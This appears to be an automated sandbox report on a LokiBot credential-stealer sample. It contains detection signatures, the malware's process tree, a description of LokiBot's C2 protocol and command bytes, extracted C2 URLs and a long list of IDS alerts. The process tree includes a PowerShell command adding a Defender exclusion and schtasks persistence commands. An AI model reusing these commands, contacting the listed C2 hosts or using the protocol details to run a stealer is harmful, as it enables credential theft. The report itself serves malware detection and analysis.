Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gunzipped.exe

Overview

General Information

Sample name:gunzipped.exe
Analysis ID:1427123
MD5:8864b52d242037414b7c4a230c390ab8
SHA1:47680d0f0d286097f7cdda37947aaaacd7226ee3
SHA256:d405284f75cde4b8c45e3d5c3b41c7bbd6db2c75788cb6d0b1deec5ea60559a4
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • gunzipped.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 8864B52D242037414B7C4A230C390AB8)
    • powershell.exe (PID: 5684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4180 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gunzipped.exe (PID: 3172 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 8864B52D242037414B7C4A230C390AB8)
    • gunzipped.exe (PID: 4080 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 8864B52D242037414B7C4A230C390AB8)
  • WiHDtnb.exe (PID: 3220 cmdline: C:\Users\user\AppData\Roaming\WiHDtnb.exe MD5: 8864B52D242037414B7C4A230C390AB8)
    • schtasks.exe (PID: 1396 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WiHDtnb.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Roaming\WiHDtnb.exe" MD5: 8864B52D242037414B7C4A230C390AB8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://136.244.109.75/index.php/1748937"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17770:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x4b3b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 40 entries
          SourceRuleDescriptionAuthorStrings
          12.2.WiHDtnb.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            12.2.WiHDtnb.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              12.2.WiHDtnb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                12.2.WiHDtnb.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                12.2.WiHDtnb.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 45 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", ProcessId: 5684, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", ProcessId: 5684, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WiHDtnb.exe, ParentImage: C:\Users\user\AppData\Roaming\WiHDtnb.exe, ParentProcessId: 3220, ParentProcessName: WiHDtnb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp", ProcessId: 1396, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", ProcessId: 6276, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe", ProcessId: 5684, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6400, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp", ProcessId: 6276, ProcessName: schtasks.exe
                Timestamp:04/17/24-03:18:07.152097
                SID:2024318
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:07.152097
                SID:2024313
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:28.314689
                SID:2024313
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:42.872387
                SID:2025381
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:07.139176
                SID:2024318
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:02.984312
                SID:2021641
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:07.139176
                SID:2024313
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:46.390927
                SID:2021641
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:19.154295
                SID:2025381
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:49.380266
                SID:2025381
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:31.711088
                SID:2021641
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:50.868001
                SID:2021641
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:32.922641
                SID:2024318
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:28.314689
                SID:2024318
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:32.922641
                SID:2024313
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:02.659962
                SID:2024318
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:44.899678
                SID:2025381
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:58.145128
                SID:2021641
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:01.257517
                SID:2025381
                Source Port:49712
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:02.659962
                SID:2024313
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:23.842884
                SID:2021641
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:13.162928
                SID:2024313
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:47.288202
                SID:2024318
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:38.899573
                SID:2021641
                Source Port:49784
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:27.158635
                SID:2025381
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:56.772780
                SID:2025381
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:13.162928
                SID:2024318
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:47.288202
                SID:2024313
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:47.882152
                SID:2024313
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:13.442138
                SID:2024313
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:20.835118
                SID:2024313
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:47.882152
                SID:2024318
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:20.835118
                SID:2024318
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:14.663282
                SID:2025381
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:20.757055
                SID:2021641
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:41.291392
                SID:2024313
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:41.291392
                SID:2024318
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:13.442138
                SID:2024318
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:11.616140
                SID:2021641
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:55.317148
                SID:2024313
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:55.317148
                SID:2024318
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:34.754471
                SID:2025381
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:34.395592
                SID:2025381
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:41.923839
                SID:2025381
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:53.924913
                SID:2021641
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:10.136681
                SID:2024318
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:28.661125
                SID:2021641
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:30.128575
                SID:2025381
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:58.235959
                SID:2025381
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:40.424546
                SID:2024318
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:54.967221
                SID:2024313
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:59.618244
                SID:2024313
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:40.424546
                SID:2024313
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:31.393355
                SID:2024318
                Source Port:49779
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:04.154071
                SID:2024313
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:59.618244
                SID:2024318
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:50.302449
                SID:2021641
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:31.393355
                SID:2024313
                Source Port:49779
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:54.967221
                SID:2024318
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:10.084965
                SID:2025381
                Source Port:49765
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:04.154071
                SID:2024318
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:19.349314
                SID:2025381
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:10.136681
                SID:2024313
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:51.797146
                SID:2024313
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:43.385034
                SID:2024313
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:44.338890
                SID:2024318
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:01.176692
                SID:2021641
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:22.368817
                SID:2025381
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:17.652364
                SID:2024313
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:51.797146
                SID:2024318
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:08.603347
                SID:2021641
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:59.708947
                SID:2024318
                Source Port:49711
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:22.632421
                SID:2025381
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:17.652364
                SID:2024318
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:16.164912
                SID:2021641
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:39.820705
                SID:2025381
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:35.861538
                SID:2024313
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:53.759072
                SID:2025381
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:29.847908
                SID:2025381
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:52.381113
                SID:2024318
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:59.708947
                SID:2024313
                Source Port:49711
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:08.625526
                SID:2021641
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:35.861538
                SID:2024318
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:44.338890
                SID:2024313
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:45.817567
                SID:2025381
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:16.378463
                SID:2021641
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:43.385034
                SID:2024318
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:52.381113
                SID:2024313
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:59.618244
                SID:2025381
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:14.912121
                SID:2021641
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:02.984312
                SID:2024313
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:19.349314
                SID:2021641
                Source Port:49771
